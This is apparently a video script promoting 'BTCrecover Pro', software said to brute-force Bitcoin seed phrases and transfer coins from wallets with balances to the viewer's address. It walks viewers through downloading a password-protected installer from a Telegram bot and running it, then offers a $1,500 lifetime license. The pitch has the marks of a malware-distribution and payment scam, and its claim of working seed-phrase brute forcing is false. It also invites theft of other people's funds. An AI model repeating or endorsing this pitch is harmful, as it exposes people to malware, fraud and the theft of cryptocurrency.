everyone! Today, I'm excited to share something truly groundbreaking with you. Imagine a software that can find Bitcoin wallets with balances by brute forcing seed phrases and transfer all the coins directly to your address. Sounds like something out of a sci-fi movie, right? But it's real, and I'm here to show you how it works. If you want to test this software for free for one day, simply follow the link in the description below. There, you'll find the official Telegram bot. Select the BTCrecover Pro program and follow these easy steps. Download the program archive. Unpack it. Inside, you'll find a text file with a password and the installer. Run the installer and enter the password from the file to activate the program. Once activated, BTCrecover Pro is ready to go. All you need to do is select the mining power and enter your Bitcoin wallet address. The program will start working, and you'll be able to see the results in real time. It's that simple. If you're impressed with the test, you can purchase the full version of the program for $1,500. This is a lifetime license with lifelong support. But be careful, there are many scams and fake versions out there. Only use official sources, which I've linked in the description. Don't miss your chance to be part of the crypto revolution. Click the link, test the software, and share your results in the comments. See you in the next video.